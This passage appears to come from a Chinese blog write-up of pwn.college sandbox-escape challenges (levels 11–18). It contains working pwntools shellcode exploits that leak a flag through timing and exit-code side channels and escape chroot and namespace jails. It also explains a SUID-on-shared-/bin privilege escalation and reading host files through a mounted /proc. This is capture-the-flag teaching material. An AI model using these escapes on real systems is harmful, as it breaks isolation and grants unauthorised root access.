class="hljs-built_in">print</span>(flag)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-11"><a href="#level-11" class="headerlink" title="level 11"></a>level 11</h1><blockquote>
<p>Escape a chroot sandbox using shellcode, but this time only using the following syscalls: [“read”, “nanosleep”]. Note that “write” is disabled! You will need a creative way of extracting the flag data from your process!</p>
</blockquote>
<p>能用的系统调用为<code>nanosleep(), read()</code></p>
<p>其中<code>nanosleep()</code>用于让进程<strong>睡眠（暂停）指定的纳秒级时间。</strong></p>
<p>类似于爆破，前面尝试一个字节一个字节的泄露时，发现时间偏差较大，不太准确。然后rob课上讲的时候，有一个学生提了一下可以通过泄露每个字节的bit，bit是确切的。泄露比特时，1便延迟1秒，0就不延迟，差距比较大，所以泄露出来是准确的。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> time<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;info&#x27;</span><br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level11&quot;, &quot;/flag&quot;, &quot;arg2&quot;], &quot;b *main+830&quot;, close_fds=False)</span><br>flag = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0x39</span>):<br>    f = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>        p = process([<span class="hljs-string">&quot;/challenge/babyjail_level11&quot;</span>, <span class="hljs-string">&quot;/flag&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br>        shellcode = shellcraft.read(<span class="hljs-number">3</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0x39</span>)<br>        shellcode += <span class="hljs-string">f&quot;&quot;&quot;</span><br><span class="hljs-string">            xor rax, rax</span><br><span class="hljs-string">            push rax</span><br><span class="hljs-string">            movzx rax, byte ptr [0x1337100 + <span class="hljs-subst">&#123;i&#125;</span>]</span><br><span class="hljs-string">            shr rax, <span class="hljs-subst">&#123;x&#125;</span></span><br><span class="hljs-string">            and rax, 1</span><br><span class="hljs-string">            push rax</span><br><span class="hljs-string">            mov rdi, rsp </span><br><span class="hljs-string">        &quot;&quot;&quot;</span><br>        shellcode += shellcraft.nanosleep(<span class="hljs-string">&#x27;rdi&#x27;</span>,<span class="hljs-number">0</span>)<br>        shellcode = asm(shellcode)<br><br>        start = time.perf_counter()<br>        p.send(shellcode)<br>        p.wait()<br>        end = time.perf_counter()<br>        delta = end - start<br>        <span class="hljs-keyword">if</span> delta &lt; <span class="hljs-number">1</span>:<br>            <span class="hljs-comment"># 比特为0</span><br>            f = <span class="hljs-string">&quot;0&quot;</span> + f<br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-comment"># 比特为1</span><br>            f = <span class="hljs-string">&quot;1&quot;</span> + f<br>    flag_char = <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(f.zfill(<span class="hljs-number">8</span>),<span class="hljs-number">2</span>))<br>    flag += flag_char<br><span class="hljs-built_in">print</span>(flag)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-12"><a href="#level-12" class="headerlink" title="level 12"></a>level 12</h1><blockquote>
<p>Escape a chroot sandbox using shellcode, but this time only using the following syscalls: [“read”]. Note that “write” is disabled! You will need a creative way of extracting the flag data from your process!</p>
</blockquote>
<p>只有一个<code>read</code>能用。换言之，能够把<code>/flag</code>的数据存储到进程空间中，需要想办法把他泄露出来。</p>
<p>看rob课上展示了只执行一次程序就能泄露出flag，想了一下，没有这个方法的思路。如果各位有Rob的思路，可以评论提供一下，万分感谢。</p>
<p>我的思路：read系统调用的<code>count</code>参数为0和为1时，程序的退出代码是不一样的，且我们可以拿到程序的退出代码。</p>
<p>例如，当<code>read(0, 0x1337200, 0)</code>时，由于执行了shellcode，且shellcode没有正常退出，那么会出现段错误。<code>exit_code</code>为<code>-11</code>。</p>
<p>当<code>read(0, 0x1337200, 1)</code>时，程序会等待用户输入，而我们可以使用<code>p.wait(0.3)</code>来提前结束该进程，使得<code>exit_code</code>为<code>None</code>。</p>
<p>因此可以作为泄露依据。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> select<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;info&#x27;</span><br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level12&quot;, &quot;/flag&quot;, &quot;arg2&quot;], &quot;b *main+734&quot;, close_fds=False)</span><br><br>flag = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0x39</span>):<br>    f = <span class="hljs-string">&quot;&quot;</span><br>    <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>        p = process([<span class="hljs-string">&quot;/challenge/babyjail_level12&quot;</span>, <span class="hljs-string">&quot;/flag&quot;</span>, <span class="hljs-string">&quot;arg2&quot;</span>])<br>        shellcode = shellcraft.read(<span class="hljs-number">3</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0x39</span>)<br>        shellcode += <span class="hljs-string">f&quot;&quot;&quot;</span><br><span class="hljs-string">            movzx rax, byte ptr [0x1337100 + <span class="hljs-subst">&#123;i&#125;</span>]</span><br><span class="hljs-string">            shr rax, <span class="hljs-subst">&#123;x&#125;</span></span><br><span class="hljs-string">            and rax, 1</span><br><span class="hljs-string">        &quot;&quot;&quot;</span><br>        shellcode += shellcraft.read(<span class="hljs-number">0</span> ,<span class="hljs-number">0x1337200</span> , <span class="hljs-string">&#x27;rax&#x27;</span>)<br>        p.send(asm(shellcode))<br>        p.wait(<span class="hljs-number">0.3</span>)<br>        exit_code = p.poll()<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;exit_code: &quot;</span>, exit_code)<br>        <span class="hljs-keyword">if</span> exit_code:<br>            f = <span class="hljs-string">&quot;0&quot;</span> + f<br>        <span class="hljs-keyword">else</span>:<br>            f = <span class="hljs-string">&quot;1&quot;</span> + f<br>    flag_char = <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(f.zfill(<span class="hljs-number">8</span>),<span class="hljs-number">2</span>))<br>    flag += flag_char<br><br><span class="hljs-built_in">print</span>(flag)<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-13"><a href="#level-13" class="headerlink" title="level 13"></a>level 13</h1><blockquote>
<p>Escape a different kind of sandbox in which a jailed child process is only communicable to from a parent process.</p>
</blockquote>
<p>一步步分析一下源码，在子进程中，设置了<code>seccomp</code>，允许使用的系统调用为：<code>read, write</code>。随后便是通过read读取<code>child_socket</code>文件描述符中的数据，作为shellcode存储于<code>0x1337000</code>。这个<code>child_socket</code>的值为4。对应的<code>parent_socket</code>为3</p>
<p>在父进程中，从标准输入读取<code>shellcode</code>，并存于<code>0x1337000</code>中。然后通过<code>write</code>往文件描述符<code>3</code>中写shellcode。紧接着父进程进入一个死循环，从<code>3</code>中读取128个字节，存入<code>command</code>中。设置<code>command[9] = &#39;\0&#39;;</code></p>
<p>这个<code>command</code>能够执行的命令有：<code>print_msg, read_file</code>。其中<code>command[10]</code>开始的是<code>command_argument</code>。</p>
<p><code>print_msg</code>：将<code>command_argument</code>打印出来。</p>
<p><code>read_file</code>：执行<code>sendfile(3, open(command_argument, 0), 0, 128)</code></p>
<p>父进程通过标准输入读取shellcode，再将shellcode写入<code>3</code>中。此时子进程通过<code>4</code>读取到shellcode，并将消息*print_msg:Executing shellcode!*写入<code>4</code>中。父进程通过<code>3</code>读取到消息，并处理随后继续等待子进程的消息。</p>
<p>现在子进程需要通过shellcode向父进程发送<code>read_file:/flag</code>消息，然后再通过<code>read</code>读取到<code>/flag</code>，再<code>write</code>。</p>
<p><strong>请特别注意io中的size，因为共享管道fd的关系，若管道符中的数据没有被read完，会影响下一次write。所以，每次read和write都应该为精确的size。</strong></p>
<p>为了简化脚本，可以使用<code>exec 10000&lt;&gt;./shellcode</code>和<code>exec 10001&lt;&gt;./print_flag</code>，然后通过<code>read</code>读取相关内容进入内存区。</p>
<p><code>shellcode</code>文件的内容：</p>
<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">read_file:</span>/flag<br></code></pre></td></tr></table></figure>

<p><code>print_flag</code>文件的内容：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">print_msg</span><br></code></pre></td></tr></table></figure>

<p>最后的exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">import</span> select<br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level13&quot;], &quot;b *main+1144&quot;, close_fds=False)</span><br>p = process(<span class="hljs-string">&quot;/challenge/babyjail_level13&quot;</span>, close_fds=<span class="hljs-literal">False</span>)<br><br><span class="hljs-comment"># read pre-file</span><br>shellcode = shellcraft.read(<span class="hljs-number">10000</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0xf</span>)<br>shellcode += shellcraft.read(<span class="hljs-number">10001</span>, <span class="hljs-number">0x1337200</span>, <span class="hljs-number">0x9</span>)<br><br><span class="hljs-comment"># read_file</span><br>shellcode += shellcraft.write(<span class="hljs-number">4</span>, <span class="hljs-number">0x1337100</span>, <span class="hljs-number">0xf</span>)<br><br><span class="hljs-comment"># get /flag content</span><br>shellcode += shellcraft.read(<span class="hljs-number">4</span>, <span class="hljs-number">0x133720a</span>, <span class="hljs-number">0x3a</span>)<br><span class="hljs-comment"># print_msg:/flag</span><br>shellcode += shellcraft.write(<span class="hljs-number">4</span>, <span class="hljs-number">0x1337200</span>, <span class="hljs-number">0x3a</span>+<span class="hljs-number">0xa</span>)<br><span class="hljs-comment"># exit</span><br>shellcode += shellcraft.exit(<span class="hljs-number">0</span>)<br>p.send(asm(shellcode))<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-14"><a href="#level-14" class="headerlink" title="level 14"></a>level 14</h1><blockquote>
<p>Learn the implications of a different way of sandboxing, using modern namespacing techniques! But what if the sandbox is really sloppy?</p>
</blockquote>
<p>命名空间隔离机制，看看源码需要我们做什么。</p>
<p>首先<code>gethostname</code>获得主机名，然后判断其如果包含<code>-level</code>，且不包含<code>vm_</code>那么退出。</p>
<p>翻译一下提示信息：在dojo中，这个挑战必须在虚拟化模式下运行。请运行<code>vm connect </code>启动并连接到虚拟机，然后在虚拟机内运行此挑战。你可以通过查看shell提示符中的主机名来判断您何时在VM内运行：如果它以<code>vm_</code>开头，则表示您正在虚拟机内执行。你可以通过在每个终端上启动‘ VM connect ’从多个终端连接到VM，并且所有文件都在VM和普通容器之间共享。</p>
<p>这个挑战将使用mount namespace和pivot_root将您放入&#x2F;tmp&#x2F;jail- xxxxxx中的jail中。您将能够很容易地在这个监狱内读取一个假的flag，而不是真正的flag。如果你想要真正的flag，你必须逃逸。</p>
<p>继续看代码：<code>for (int i = 3; i &lt; 10000; i++) close(i);</code>，关闭文件描述符。<code>assert(geteuid() == 0);</code>当前挑战需要以<code>root</code>身份运行。</p>
<p><code>assert(unshare(CLONE_NEWNS) != -1);</code>调用<code>unshare</code>系统调用并传递<code>CLONE_NEWNS</code>标志，表示要创建一个新的文件系统命名空间。</p>
<p><code>unshare()</code>是Linux系统中用于创建新的进程空间的一个系统调用和命令。它允许调用进程与当前进程环境分离，并独立地管理一些进程资源。使用<code>unshare</code>时可以指定以下命名空间：</p>
<p><strong><code>CLONE_NEWNS</code></strong>：新的文件系统命名空间（mount namespace）。进程将获得一个新的挂载点视图，类似于 chroot。</p>
<p><strong><code>CLONE_NEWUTS</code></strong>：新的 UTS 命名空间（用于主机名和域名）。进程可以在独立的主机名和域名环境中运行。</p>
<p><strong><code>CLONE_NEWIPC</code></strong>：新的 IPC 命名空间（进程间通信）。进程将拥有独立的信号量、消息队列和共享内存。</p>
<p><strong><code>CLONE_NEWNET</code></strong>：新的网络命名空间。进程将具有独立的网络接口和网络堆栈。</p>
<p><strong><code>CLONE_NEWPID</code></strong>：新的 PID 命名空间。进程会拥有自己的 PID 容器，PID 号从 1 开始。</p>
<p><strong><code>CLONE_NEWUSER</code></strong>：新的用户命名空间。进程将拥有独立的用户和组 ID。</p>
<p><strong><code>CLONE_NEWTIME</code></strong>：新的时间命名空间。允许进程独立设置自己的时间。</p>
<p>随后创建新的root目录为<code>/tmp/jail-XXXXXX</code>，然后使用mount将根文件系统<code>/</code>的挂载类型更改为私有挂载，再创建一个新的目录用于存放旧的根文件系统。准备结束后，调用<code>SYS_pivot_root</code>系统调用，将当前的根文件系统切换为新的根文件系统，并将旧的根文件系统移动到<code>old/</code>目录下。也就是说，原本文件系统的<code>/bin</code>等现在在<code>/old/bin</code>下。</p>
<p>切换文件系统后，通过<code>mount</code>和<code>mkdir</code>创建目录，并将<code>/usr, /lib, /lib64</code>等挂载到<code>/old/usr, ...</code></p>
<p>最后使用<code>chdir(/)</code>将当前工作目录，切换到新的根目录下。</p>
<p><strong>原根文件系统在<code>/old</code>下，所以原<code>/proc</code>在<code>/old/proc</code>中。其中记录着jail外的各个进程。包括这些进程的根目录。</strong></p>
<p>而这些进程的根目录中存在<code>/flag</code>并没有被修改！先执行<code>vm connect</code>命令，然后运行关卡程序。进入到jail中是sudo权限，那么<code>old</code>目录有一切东西。</p>
<h1 id="level-15"><a href="#level-15" class="headerlink" title="level 15"></a>level 15</h1><blockquote>
<p>Learn the implications of a different way of sandboxing, using modern namespacing techniques! But what are the implications of sharing filesystems between the sandbox and host?</p>
</blockquote>
<p>没有<code>/old</code>文件夹了。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-comment">// let&#x27;s remove the old root mount</span><br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... unmounting old root directory.&quot;</span>);<br>assert(umount2(<span class="hljs-string">&quot;/old&quot;</span>, MNT_DETACH) != <span class="hljs-number">-1</span>);<br>assert(rmdir(<span class="hljs-string">&quot;/old&quot;</span>) != <span class="hljs-number">-1</span>);<br></code></pre></td></tr></table></figure>

<p>可以知道它mount了<code>/bin</code>目录。<code>mount bind</code>的方式将虚拟机的目录<code>/bin</code>直接共享给容器了，那么容器里的root就等于拿到了修改虚拟机<code>/bin</code>中文件的能力。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs c">assert(mkdir(<span class="hljs-string">&quot;/bin&quot;</span>, <span class="hljs-number">0755</span>) != <span class="hljs-number">-1</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... bind-mounting /bin into the jail.&quot;</span>);<br>assert(mount(<span class="hljs-string">&quot;/old/bin&quot;</span>, <span class="hljs-string">&quot;/bin&quot;</span>, <span class="hljs-literal">NULL</span>, MS_BIND, <span class="hljs-literal">NULL</span>) != <span class="hljs-number">-1</span>);<br></code></pre></td></tr></table></figure>

<p><strong>也就是获得修改容器外的&#x2F;bin的能力，而&#x2F;bin是宿主机中各种命令的源文件。</strong></p>
<p>特别的一点：<code>chmod u+s victim</code>能打开SUID位，导致任何人执行<code>victim</code>程序都会以文件所有者(root)身份运行。</p>
<p>在这里的体现就是，容器内的root给<code>cat</code>加上SUID位，当回到容器外（虚拟机内）时，<code>/bin/cat</code>已经被增加了SUID位，因此它运行时会以root身份运行。从而实现提权。</p>
<h1 id="level-16"><a href="#level-16" class="headerlink" title="level 16"></a>level 16</h1><blockquote>
<p>Learn the implications of a different way of sandboxing, using modern namespacing techniques! But what shenanigans can you get up to with special kernel-backed filesystems?</p>
</blockquote>
<p>了解使用现代名称空间技术的另一种沙盒方式的含义！但是，使用特殊的内核支持的文件系统，您可以进行哪些恶作剧呢？</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">assert(mkdir(<span class="hljs-string">&quot;/bin&quot;</span>, <span class="hljs-number">0755</span>) != <span class="hljs-number">-1</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... bind-mounting /bin into the jail.&quot;</span>);<br>assert(mount(<span class="hljs-string">&quot;/old/bin&quot;</span>, <span class="hljs-string">&quot;/bin&quot;</span>, <span class="hljs-literal">NULL</span>, MS_BIND, <span class="hljs-literal">NULL</span>) != <span class="hljs-number">-1</span>);<br><br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... making /bin read-only...&quot;</span>);<br>assert(mount(<span class="hljs-literal">NULL</span>, <span class="hljs-string">&quot;/bin&quot;</span>, <span class="hljs-literal">NULL</span>, MS_REMOUNT|MS_RDONLY|MS_BIND, <span class="hljs-literal">NULL</span>) != <span class="hljs-number">-1</span>);<br></code></pre></td></tr></table></figure>

<p><code>mount(NULL, &quot;/bin&quot;, NULL, MS_REMOUNT|MS_RDONLY|MS_BIND, NULL)</code>将<code>/bin</code>目录设置为只读挂载。那么<code>level 15</code>的解题方法就失效了。</p>
<p>但是这里它额外挂载了<code>/proc</code>：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs c">assert(mkdir(<span class="hljs-string">&quot;/proc&quot;</span>, <span class="hljs-number">0755</span>) != <span class="hljs-number">-1</span>);<br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... bind-mounting /proc into the jail.&quot;</span>);<br>assert(mount(<span class="hljs-string">&quot;/old/proc&quot;</span>, <span class="hljs-string">&quot;/proc&quot;</span>, <span class="hljs-literal">NULL</span>, MS_BIND, <span class="hljs-literal">NULL</span>) != <span class="hljs-number">-1</span>);<br><br><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... making /proc read-only...&quot;</span>);<br>assert(mount(<span class="hljs-literal">NULL</span>, <span class="hljs-string">&quot;/proc&quot;</span>, <span class="hljs-literal">NULL</span>, MS_REMOUNT|MS_RDONLY|MS_BIND, <span class="hljs-literal">NULL</span>) != <span class="hljs-number">-1</span>);<br></code></pre></td></tr></table></figure>

<p>那么发现，它挂载的时候，把整个原proc给放进来了。那么可以直接去到&#x2F;proc中拿到flag。</p>
<img src="/2025/06/09/pwn-college-Sanboxing/image-20250609151346303.png" srcset="/img/loading.gif" lazyload class="" title="image-20250609151346303">



<h1 id="level-17"><a href="#level-17" class="headerlink" title="level 17"></a>level 17</h1><blockquote>
<p>Learn the implications of a different way of sandboxing, using modern namespacing techniques! But what happens if you can smuggle in a resource from the outside?</p>
</blockquote>
<p>了解使用现代名称空间技术的另一种沙盒方式的含义！但如果你能从外部偷运资源呢？</p>
<p>执行<code>shellcode</code>，和之前的<code>chroot</code>关卡一致。先打开一个<code>dirfd</code>，然后<code>openat</code>打开<code>/flag</code>，随后<code>sendfile</code>即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(arch=<span class="hljs-string">&quot;amd64&quot;</span>,os=<span class="hljs-string">&quot;linux&quot;</span>,log_level=<span class="hljs-string">&quot;info&quot;</span>,terminal=[<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>])<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><span class="hljs-comment"># p = gdb.debug([&quot;/challenge/babyjail_level17&quot;, &quot;/&quot;], &quot;b *main+1782&quot;, close_fds=False)</span><br><br>p = process([<span class="hljs-string">&quot;/challenge/babyjail_level17&quot;</span>, <span class="hljs-string">&#x27;/&#x27;</span>], close_fds=<span class="hljs-literal">False</span>)<br><br>shellcode = shellcraft.openat(<span class="hljs-number">3</span>, <span class="hljs-string">&#x27;flag&#x27;</span>, os.O_RDONLY, <span class="hljs-number">0</span>)<br>shellcode += shellcraft.syscall(<span class="hljs-string">&#x27;SYS_sendfile&#x27;</span>, <span class="hljs-number">1</span>, <span class="hljs-number">4</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0x3a</span>)<br>p.send(asm(shellcode))<br>p.interactive()<br></code></pre></td></tr></table></figure>



<h1 id="level-18"><a href="#level-18" class="headerlink" title="level 18"></a>level 18</h1><blockquote>
<p>Learn the implications of a different way of sandboxing, using modern namespacing techniques! What could be the harm of mounting in a harmless directory?</p>
</blockquote>
<p>了解使用现代名称空间技术的另一种沙盒方式的含义！在一个无害的目录中挂载会有什么害处呢？</p>
<p>新的限制条件：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c">assert(argv[<span class="hljs-number">1</span>][<span class="hljs-number">0</span>] == <span class="hljs-string">&#x27;/&#x27;</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;.&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;flag&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;root&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;tmp&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;var&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;run&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;dev&quot;</span>) == <span class="hljs-literal">NULL</span>);<br>assert(<span class="hljs-built_in">strstr</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">&quot;fd&quot;</span>) == <span class="hljs-literal">NULL</span>);<br></code></pre></td></tr></table></figure>

<p>参数不能是<code>/, ., flag, root ...</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;... to minimize shenanigans, we only support your home dir or a non-writable leaf directory (no subdirs).&quot;</span>);<br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">stat</span> <span class="hljs-title">statbuf</span>;</span><br><span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">dirent</span> *<span class="hljs-title">dent</span>;</span><br><span class="hljs-type">char</span> dirpath[<span class="hljs-number">1024</span>];<br>DIR *dir;<br><br>assert(lstat(argv[<span class="hljs-number">1</span>], &amp;statbuf) != <span class="hljs-number">-1</span>);<br>assert(S_ISDIR(statbuf.st_mode));<br>assert(dir = opendir(argv[<span class="hljs-number">1</span>]));<br><span class="hljs-keyword">while</span> ((dent = readdir(dir)) != <span class="hljs-literal">NULL</span>)<br>&#123;<br>    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(dent-&gt;d_name, <span class="hljs-string">&quot;.&quot;</span>) == <span class="hljs-number">0</span> || <span class="hljs-built_in">strcmp</span>(dent-&gt;d_name, <span class="hljs-string">&quot;..&quot;</span>) == <span class="hljs-number">0</span>) <span class="hljs-keyword">continue</span>;<br>    <span class="hljs-built_in">snprintf</span>(dirpath, <span class="hljs-number">1024</span>, <span class="hljs-string">&quot;%s/%s&quot;</span>, argv[<span class="hljs-number">1</span>], dent-&gt;d_name);<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;... making sure %s is not a directory\n&quot;</span>, dirpath);<br>    assert(stat(dirpath, &amp;statbuf) != <span class="hljs-number">-1</span>);<br>    assert(!S_ISDIR(statbuf.st_mode));<br>&#125;<br>closedir(dir);<br></code></pre></td></tr></table></figure>

<p>检查参数是否存在且是一个目录，尝试打开该目录，遍历这个目录，跳过当前目录和父目录。对该目录下的每个文件进行检查，确保文件存在且不是目录，只允许普通文件或者符号链接。</p>
<p>后续会将参数提供的这个目录，<em>只读</em>绑定进容器中。</p>
<p><code>setns()</code>是Linux的一个系统调用(System Call)，用于让当前进程进入另一个命名空间。</p>
<p><code>int setns(int fd, int nstype);</code>其中<code>fd</code>是指向<code>namespace</code>的文件描述符（通常是<code>/proc/[pid]/ns/*</code>），<code>nstype</code>是命名空间类型，可设置为0表示不检查类型。</p>
<blockquote>
